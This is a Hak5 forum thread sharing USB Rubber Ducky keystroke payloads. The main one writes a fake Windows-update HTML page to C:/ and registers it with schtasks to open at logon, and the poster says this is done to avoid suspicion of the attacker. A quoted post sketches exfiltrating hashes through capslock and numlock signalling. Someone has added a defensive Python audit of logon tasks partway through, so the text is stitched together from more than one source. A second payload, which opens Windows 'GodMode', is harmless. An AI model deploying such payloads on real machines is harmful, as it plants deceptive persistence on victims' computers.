
[Payload] Ducky Payload


tbstuntz


This idea was to set a scheduled task to run on logon, in this case load an HTML page.

Instead of the content/exploit being set up instantly, i.e. when you're still near the target machine, it would be scheduled to run later to erase any suspicion that you were involved.

Just another concept for the ducky community :)

REM Author : Stuntz
REM Description : Creates index.html stored in C:/ and automatically opens it when user logs in.
REM Version : 0.1
CONTROL ESCAPE
DELAY 200
STRING notepad.exe
DELAY 200
MENU
DELAY 100
STRING a
ENTER
DELAY 200
LEFT
ENTER
DELAY 500
STRING <html>
ENTER
STRING <body>
ENTER
STRING <h1>Your windows machine needs to be upgraded</h1>
ENTER
STRING <input type="submit" value="Update Now" />
ENTER
STRING HAK5 DUCKY
ENTER
CONTROL s
DELAY 100
STRING index.html
TAB
DOWNARROW
DOWNARROW
TAB
TAB
TAB
TAB
TAB
ENTER
STRING C:/
ENTER
SHIFT TAB
DELAY 100
SHIFT TAB
DELAY 100
ENTER
DELAY 100
ALT F4
DELAY 100
CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
ENTER
DELAY 200
LEFT
ENTER
DELAY 1000
STRING schtasks /Create /TN Hak5Update /SC ONLOGON /TR "C:\index.html"
ENTER
DELAY 100
STRING exit
ENTER

Just read on another post from Darren that with the new firmware the Ducky will support on-board file storage, so that kind of eliminates the need of this to download a file. Oh well, might be of some use.

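For defenders checking a machine for the persistence described in the post above (a logon-triggered task whose action is a dropped HTML file), the following added example, which is not part of the original thread, audits task definitions exported with `schtasks /Query /XML`. The sample XML is constructed, and the allowed-extension list and the drive-root check are an assumed policy.

```python
import ntpath
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumed policy: a logon/boot task should launch one of these program types.
PROGRAM_EXTS = {".exe", ".com", ".bat", ".cmd", ".msc"}
PERSISTENCE_TRIGGERS = ("LogonTrigger", "BootTrigger")

# Constructed sample resembling the task the payload creates (TN Hak5Update).
SUSPECT = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\index.html</Command></Exec></Actions>
</Task>"""

# Constructed sample of an ordinary vendor updater for comparison.
BENIGN = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\updater.exe</Command></Exec></Actions>
</Task>"""


def audit_task(name, xml_text):
    """Return findings for one task definition; empty list means nothing flagged."""
    root = ET.fromstring(xml_text)
    triggers = [k for k in PERSISTENCE_TRIGGERS
                if root.find(f"t:Triggers/t:{k}", NS) is not None]
    if not triggers:
        return []  # only tasks that fire at logon or boot are in scope here
    findings = []
    for cmd in root.findall("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"')
        ext = ntpath.splitext(path)[1].lower()
        # Path of the containing folder without the drive letter.
        folder = ntpath.splitdrive(ntpath.dirname(path))[1]
        if ext not in PROGRAM_EXTS:
            findings.append(f"{name}: {triggers[0]} opens non-program file {path}")
        if folder in ("\\", "/"):
            findings.append(f"{name}: {triggers[0]} target sits in a drive root: {path}")
    return findings


if __name__ == "__main__":
    for task_name, xml_text in (("Hak5Update", SUSPECT), ("VendorUpdate", BENIGN)):
        for line in audit_task(task_name, xml_text) or [f"{task_name}: nothing flagged"]:
            print(line)
```

On a live host the same function can be fed the XML returned for each task name; Security event 4698 (scheduled task created) carries the same task definition when that audit policy is enabled.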

Everyone has probably come across GODMODE on Windows 7 before.

This loads it so you can select lots of tools simply by using the down arrow and enter.

REM Author : Stuntz
REM Description : Opens up GOD Mode on windows 7. Allows you to access tools with down arrow and enter:)
GUI d
MENU
DELAY 100
STRING w
DELAY 100
STRING f
DELAY 100
STRING GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
ENTER
ENTER


Everyone has probably come across GODMODE on Windows 7 before.

This loads it so you can select lots of tools simply by using the down arrow and enter.

REM Author : Stuntz
REM Description : Opens up GOD Mode on windows 7. Allows you to access tools with down arrow and enter:)
MENU
DELAY 100
STRING w
DELAY 100
STRING f
DELAY 100
STRING GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
ENTER
ENTER

probably a good idea to throw a

GUI d

in at the start there.

just saiyan.

but a cool way to get to a fair few of the control panel tools. thanks for the share :)

there are a few other folder tricks like that which can be fun to mess with. but this is by far the most useful for the duckie xD


Just read on another post from Darren that with the new firmware the Ducky will support on-board file storage, so that kind of eliminates the need of this to download a file. Oh well, might be of some use.

Hi, can you post the link to the post in which he talks about the on-board storage?

thanks


http://forums.hak5.org/index.php?showtopic=21103 & http://forums.hak5.org/index.php?showtopic=21125

Darren: "Brilliant! I could see adding to the firmware a function that captures capslock and numlock states. That way you could, albeit slowly, send data back to the duck without using conventional means. For example, if capslock represented 1 and numlock 0, with the right payload you could extract hash data from a target machine and send their binary equivalents back to the ducky."
